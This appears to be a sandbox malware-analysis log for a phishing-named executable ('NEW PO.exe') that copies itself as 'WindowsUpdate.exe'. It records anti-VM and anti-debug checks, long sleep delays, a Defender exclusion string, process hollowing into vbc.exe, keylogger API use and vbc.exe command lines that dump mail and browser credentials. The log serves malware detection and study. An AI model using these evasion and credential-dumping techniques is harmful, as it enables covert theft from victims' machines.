Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97156s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97046s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6016	Thread sleep time: -180000s >= -30000s

Source: C:\Users\user\Desktop\NEW PO.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

10_2_00408836

Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\Desktop\NEW PO.exe	Window / User API: threadDelayed 742	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Window / User API: threadDelayed 1030	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Window / User API: threadDelayed 1274

Source: C:\Users\user\Desktop\NEW PO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 42920	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 140000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 99324	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 99140	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 98867	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 98429	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 98325	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 97240	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 97115	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96984	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96625	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96515	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 95890	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 38078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 36592
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 99703
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 99093
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 98928
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 98426
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 98297
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 98156
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 98046
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97921
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97812
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97703
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97593
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97484
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97375
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97265
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97156
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 97046
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Thread delayed: delay time: 180000

Source: WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: NEW PO.exe, 00000000.00000003.294779482.00000000080E0000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000003.353245036.0000000007330000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000011.00000003.370785352.0000000007460000.00000004.00000001.sdmp	Binary or memory string: QEmu.
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	Binary or memory string: +QEmu
Source: WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: NEW PO.exe, 00000007.00000000.316706210.0000000000E25000.00000004.00000020.sdmp, WindowsUpdate.exe, 00000010.00000002.358757516.0000000000E77000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\NEW PO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_004161B0 memset,GetSystemInfo,

10_2_004161B0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,	10_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,	10_2_00407E0E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00406EC3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

10_2_00408836

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_004422C7

Source: C:\Users\user\Desktop\NEW PO.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412

Source: C:\Users\user\Desktop\NEW PO.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\NEW PO.exe

Code function: 7_2_07A65190 LdrInitializeThunk,

7_2_07A65190

Source: C:\Users\user\Desktop\NEW PO.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000

.NET source code references suspicious native API functions

Show sources

Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.11.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.6.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.38.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.21.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.16.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.26.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.0.NEW PO.exe.400000.4.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 7.2.NEW PO.exe.400000.0.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')

Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Users\user\Desktop\NEW PO.exe C:\Users\user\Desktop\NEW PO.exe	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412

Source: NEW PO.exe, 00000007.00000000.317050619.0000000001540000.00000002.00020000.sdmp, WindowsUpdate.exe, 00000012.00000000.397848974.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: NEW PO.exe, 00000007.00000000.317050619.0000000001540000.00000002.00020000.sdmp, WindowsUpdate.exe, 00000012.00000000.397848974.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: NEW PO.exe, 00000007.00000000.317050619.0000000001540000.00000002.00020000.sdmp, WindowsUpdate.exe, 00000012.00000000.397848974.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: NEW PO.exe, 00000007.00000000.317050619.0000000001540000.00000002.00020000.sdmp, WindowsUpdate.exe, 00000012.00000000.397848974.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Users\user\Desktop\NEW PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
